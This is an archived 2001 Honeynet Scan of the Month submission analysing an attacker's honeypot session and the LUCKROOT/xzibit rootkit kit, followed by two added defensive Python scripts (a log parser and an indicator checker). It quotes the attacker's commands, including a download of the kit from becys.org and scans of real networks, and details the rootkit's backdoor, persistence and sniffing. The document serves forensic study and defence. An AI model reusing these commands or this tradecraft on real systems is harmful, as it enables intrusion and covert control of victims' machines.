From dkwan@ca.ibm.com Fri Mar 23 10:14:00 2001
Date: Tue, 20 Mar 2001 15:14:04 -0500
From: Derek Kwan
To: project@honeynet.org
Subject: Scan of the month

###################################
# 1. What is the blackhat attempting to do with his command line syntax?
###################################

Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
> change directory to .mail

Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
> oops, there is no .mail directory in the current directory, or he/she thinks he/she is in
> /usr/sbin....

Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
> let's start my favourite plain text web browser lynx and grab a copy of LUCKROOT.TAR
>
> Note: LUCKROOT.TAR is actually a gzip file, the original filename could be LUCKROOT.TAR.GZ
> and maybe the file was uploaded from a Windows machine and therefore
> 1) Lost the .GZ extension
> 2) Filename became all UPPERcase (i.e. original filename maybe = luckroot.tar.gz)
> Or, the attacker just wanted to make the file type not so obvious (?)

Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
> y - Trying to answer if (he) wants to quit lynx
> Note: Seems like a few keystrokes are missing from the capture..... There should be a 'D'
> for download, and some other key hits.... Hummmm...

Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
> Let's untar the file....

Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
> oops! should specify the f option last... ;)

Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
> oops! Uppercase... 'U'... backspace.

Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
> Ah, finally... got it right...

Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
> change into the luckroot directory

Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
> launch a scan for the 216.210.0.0 network
> Owners: Total.Net, Pacific Coast NET, Advanced Telcom Group, Learning Tools International etc
> (To name just a few....)

Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
> launch a scan for the 200.120.0.0 network

Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
> launch a scan for the 64.120.0.0 network
> Owner: Teligent

Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
> oops.... missed a '/'.... '.' is not in the current PATH

Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128

Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
> Mostly @Home network...
> Side note: we did get a few scans from 24. on port 111 that day.... is this honeypot
> by any chance on the @Home network?

Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20
> and so on ......

###################################
# 2. What does the tool accomplish?
###################################

Scans a subnet on port 111 looking for an RPC exploit. If found, then it will try to r00t it and create a shell on port 39168. Then thru the shell port, it gets some info (e.g. machine info 'uname -a', user info 'id'), downloads a copy of xzibit.tar.gz, unpacks it, installs it, then erases it.

BTW, I wonder if the attacker is a Hip Hop fan, there is a group actually called xzibit... ;)

###################################
# 3. How does the tool work?
###################################

First, luckgo is a shell script. It first defines a bunch of ANSI 'effects' (e.g. blink, color etc.. Remember the good old BBS days with ANSI art?)

If luckgo cannot find the binaries luckscan-a & luckstatdx it will compile a copy using gcc.

The scan.log file will be removed if found (I don't know where scan.log is coming from... maybe it is some leftover from debugging?)

Then it will start the first binary, luckscan-a, with the default of port 111.
Note: even though the instructions from luckgo say to scan a class A address, it can actually take up to 3 parameters and scan a smaller subnet (i.e. x.y.z.0-255)

luckscan-a will then try to connect to port 111 and see if it can get any connections.... luckscan-a has the max number of sockets set to 1000... and if port 111 is accepting connections, it will prepare a command line "./luckstatdx -d 0 {ip addr}" and try to r00t the victim machine.

luckstatdx mainly contains shellcode (I think I have seen an example of this shellcode somewhere on the web before, can't find it at the moment. It was a pretty well written paper...) and is designed for the IA32 CPU (i.e. mainly targeted at x86 machines...)

Once a machine is r00ted, it will install a Trojan 'xzibit' on the victim machine. On the victim machine the following commands will be replaced (or should I say 'Trojanized'):

hdparm, ifconfig, install, netstat, ps, ssh_host_key, ssh_random_seed, top

Note:
* hdparm will go to /dev/ida/.inet and start "sshdu -f ./s" (start a trojan? ssh daemon using 's' as the systemwide config file), then start linsniffer and pipe output to tcp.log
* ifconfig is based on
    Source: net-tools 1.32-alpha net-tools@lina.inka.de (Bernd Eckenfels)
    Kernelsource: 2.1.9
    ifconfig 1.22 (1996-05-09)
* install will "Replacing netstat, ps, ifconfig, top", then the files dsx & caca are created in the /dev directory.
  /dev/ida/.inet is created and these files will be moved there:
    linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c
  Note: sl2new.c is missing..... wonder what it is. Maybe it is a leftover from debugging?
  Then "/usr/bin/hdparm -t1 -X53 -p" will be added to the victim's /etc/rc.d/rc.sysinit (so it can make sure after a reboot there is still a backdoor available!)
  Then it will try to copy becys.cgi to these directories (if they exist):
    /home/httpd/cgi-bin
    /usr/local/httpd/cgi-bin
    /usr/local/apache/cgi-bin
    /www/httpd/cgi-bin
    /www/cgi-bin
  Once done, it will send the IP and hostname to becys@becys.org with the Subject "becys rewting". Then it will remove the directory lamerk, and the file xzibit.tar.gz.

The following 'Utils' will be installed:
linsniffer, logclear, s, sense, sl2, sshdu, becys.cgi

Note:
* becys.cgi seems to be a http daemon
* sshdu seems to be based on sshd ver 1.2.27
* sl2 - I wonder if it is a scanner of some sort... "Usage: %s srcaddr dstaddr low high"
* sense is a perl script written by Mike Edulla that sorts the output from LinSniffer
* s is the ssh server systemwide configuration file.
* logclear will first kill all linsniffer, del tcp.log, touch tcp.log, then start linsniffer and pipe output to tcp.log

###################################
# 4. Is this tool a worm, or would you classify it as something else?
###################################

Worm? I would say no. From the Jargon dictionary:

worm n. [from `tapeworm' in John Brunner's novel "The Shockwave Rider", via XEROX PARC] A program that propagates itself over a network, reproducing itself as it goes. Compare virus. Nowadays the term has negative connotations, as it is assumed that only crackers write worms. Perhaps the best-known example was Robert T. Morris's Great Worm of 1988, a `benign' one that got out of control and hogged hundreds of Suns and VAXen across the U.S. See also cracker, RTM, Trojan horse, ice.

Since it doesn't seem like it will automagically infect other machines, I guess this is not a worm. Even LUCKROOT is just a tool that will assist in r00ting other victim boxes....

###################################
# 5. Is this tool original, or is it simply based on previous tools?
# If based on previous tools, which ones and what is modified?
###################################

LUCKROOT.TAR - done by becys
luckgo - seems to be written by becys w/ help from ReSpEkT
luckscan-a.c - not sure who wrote it, maybe becys?
luckstatdx.c - seems like it was written by ron1n (McDonalds drive-thru guy @ Sydney, Australia) as statdx and modified by becys

statdx first appeared (to my knowledge) Sat, 5 Aug 2000 03:43:20 EST at BUGTRAQ@SECURITYFOCUS.COM
Prime targets are RedHat 6.0, 6.1 & 6.2; in the original code, ron1n talks about how the buffer overflow exploit works. And that part was taken out by becys in his/her luckstatdx.c

###
# Bonus Question:
# What information can you obtain about who is using or created the tool?
###

Well, from the machine IP & machine name sent back to the e-mail address, I would say it is becys@becys.org
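Added example (not part of Derek's submission): a small parser for the honeypot's "-bash: HISTORY: PID=... UID=..." syslog lines from question 1 that rebuilds the session timeline and turns each "./luckgo A B" run into the network it scans, using the note from question 3 that luckgo takes one to three octets. The sample lines are copied from the capture above; the regexes, function and field names are my own, and the ".luckgo 216 200" typo is deliberately left unmatched because that invocation never ran.

```python
"""Reconstruct an attacker session from bash HISTORY syslog lines.

Added example, not code from the original Scan of the Month analysis.
Parses the honeypot's per-command history logging and extracts the
networks targeted with ./luckgo.  Function and field names are assumed.
"""
import ipaddress
import re
from dataclasses import dataclass

# Line format of the honeypot's bash history logging, as seen in the capture.
HISTORY_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) -bash: HISTORY: PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$"
)

# luckgo takes one to three leading octets; a third octet narrows the scan
# to x.y.z.0-255 (question 3).  Only the correctly typed ./luckgo form ran.
LUCKGO_RE = re.compile(r"^\./luckgo((?:\s+\d{1,3}){1,3})\s*$")


@dataclass(frozen=True)
class HistoryEvent:
    ts: str
    host: str
    pid: int
    uid: int
    cmd: str


def parse_history(text):
    """Parse every matching line; lines that do not fit the format are skipped."""
    events = []
    for line in text.splitlines():
        m = HISTORY_RE.match(line.strip())
        if m:
            events.append(HistoryEvent(m["ts"], m["host"], int(m["pid"]),
                                       int(m["uid"]), m["cmd"]))
    return events


def luckgo_target(cmd):
    """Map a './luckgo A [B [C]]' command to the network it scans, as CIDR text."""
    m = LUCKGO_RE.match(cmd)
    if not m:
        return None  # also covers the '.luckgo 216 200' typo, which never ran
    octets = [int(x) for x in m.group(1).split()]
    if any(o > 255 for o in octets):
        return None
    prefix = 8 * len(octets)
    padded = octets + [0] * (4 - len(octets))
    return str(ipaddress.ip_network(f"{'.'.join(map(str, padded))}/{prefix}"))


def scanned_networks(events):
    """(timestamp, network) for each luckgo run, in order, duplicates kept."""
    out = []
    for ev in events:
        net = luckgo_target(ev.cmd)
        if net:
            out.append((ev.ts, net))
    return out


def root_sessions(events):
    """Shell PIDs that issued commands as UID 0, with a command count each."""
    counts = {}
    for ev in events:
        if ev.uid == 0:
            counts[ev.pid] = counts.get(ev.pid, 0) + 1
    return counts


# Sample lines copied from the capture discussed in question 1.
SAMPLE_LOG = """\
Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
"""

if __name__ == "__main__":
    evs = parse_history(SAMPLE_LOG)
    for ts, net in scanned_networks(evs):
        print(ts, net)
    print(root_sessions(evs))
```

Feeding the full history from question 1 through scanned_networks() gives the list of /16s the attacker swept, which is what you would hand to the owners of those address blocks (or compare against your own inbound port 111 scan logs, as the side note about the 24. network does).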
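Added example (not part of Derek's submission and not code from the xzibit kit): a triage check that matches a host snapshot against the indicators listed in question 3: the /dev/ida/.inet directory and its files, the dsx and caca scratch files in /dev, the hdparm line appended to /etc/rc.d/rc.sysinit, becys.cgi in the cgi-bin directories, and the port 39168 shell from question 2. Since the kit replaces ps, netstat and ifconfig, the listening-port list has to come from an outside port scan and is compared with what the box's own netstat admits to. The snapshot layout, the sample data and the function names are my own.

```python
"""Triage checks for the xzibit rootkit indicators described above.

Added example, not code from the original analysis or from the kit.
Matches a host snapshot against the paths, the rc.sysinit persistence
line, the cgi-bin drop and the port 39168 shell named in the write-up.
"""
import os
from dataclasses import dataclass, field

HIDDEN_DIR = "/dev/ida/.inet"
HIDDEN_FILES = ["linsniffer", "logclear", "sense", "sl2", "sshdu", "s",
                "ssh_host_key", "ssh_random_seed"]
DEV_FILES = ["/dev/dsx", "/dev/caca"]
CGI_DIRS = ["/home/httpd/cgi-bin", "/usr/local/httpd/cgi-bin",
            "/usr/local/apache/cgi-bin", "/www/httpd/cgi-bin", "/www/cgi-bin"]
RC_SYSINIT = "/etc/rc.d/rc.sysinit"
PERSISTENCE_LINE = "/usr/bin/hdparm -t1 -X53 -p"
SHELL_PORT = 39168


@dataclass
class HostSnapshot:
    paths: set = field(default_factory=set)            # files/dirs that exist
    rc_sysinit: str = ""                               # contents of rc.sysinit
    external_ports: set = field(default_factory=set)   # from an outside scan
    netstat_ports: set = field(default_factory=set)    # what local netstat shows


def find_indicators(snap):
    """Return human-readable findings; an empty list means nothing matched."""
    hits = []
    if HIDDEN_DIR in snap.paths:
        hits.append(f"hidden directory present: {HIDDEN_DIR}")
    for name in HIDDEN_FILES:
        p = f"{HIDDEN_DIR}/{name}"
        if p in snap.paths:
            hits.append(f"rootkit component: {p}")
    for p in DEV_FILES:
        if p in snap.paths:
            hits.append(f"installer scratch file: {p}")
    for d in CGI_DIRS:
        p = f"{d}/becys.cgi"
        if p in snap.paths:
            hits.append(f"dropped cgi backdoor: {p}")
    for line in snap.rc_sysinit.splitlines():
        if PERSISTENCE_LINE in line:
            hits.append(f"persistence in {RC_SYSINIT}: {line.strip()}")
    if SHELL_PORT in snap.external_ports:
        hits.append(f"bindshell port {SHELL_PORT} open")
    # Trojaned netstat hides the kit's listeners: anything the outside scan
    # sees that netstat does not is a finding on its own.
    for port in sorted(snap.external_ports - snap.netstat_ports):
        hits.append(f"port {port} open externally but hidden from netstat")
    return hits


def snapshot_from_live_host():
    """Build a snapshot of the running box; add ports from an outside scan yourself."""
    candidates = [HIDDEN_DIR, *DEV_FILES,
                  *(f"{HIDDEN_DIR}/{n}" for n in HIDDEN_FILES),
                  *(f"{d}/becys.cgi" for d in CGI_DIRS)]
    snap = HostSnapshot(paths={p for p in candidates if os.path.lexists(p)})
    if os.path.isfile(RC_SYSINIT):
        with open(RC_SYSINIT, errors="replace") as fh:
            snap.rc_sysinit = fh.read()
    return snap


# Constructed snapshot of a box compromised the way question 3 describes.
INFECTED = HostSnapshot(
    paths={HIDDEN_DIR, f"{HIDDEN_DIR}/sshdu", f"{HIDDEN_DIR}/linsniffer",
           "/dev/caca", "/www/cgi-bin/becys.cgi"},
    rc_sysinit="#!/bin/sh\n# ... normal init ...\n/usr/bin/hdparm -t1 -X53 -p\n",
    external_ports={22, 111, 39168},
    netstat_ports={22, 111},
)
# Constructed snapshot of an untouched box.
CLEAN = HostSnapshot(paths={"/dev/null"}, rc_sysinit="#!/bin/sh\n",
                     external_ports={22}, netstat_ports={22})

if __name__ == "__main__":
    for h in find_indicators(INFECTED):
        print(h)
```

The path list is only as good as the attacker's laziness; what survives a renamed kit is the rc.sysinit line (anything launching hdparm with those flags at boot is worth a look) and the gap between an outside port scan and the host's own netstat, which is why the snapshot keeps both port sets.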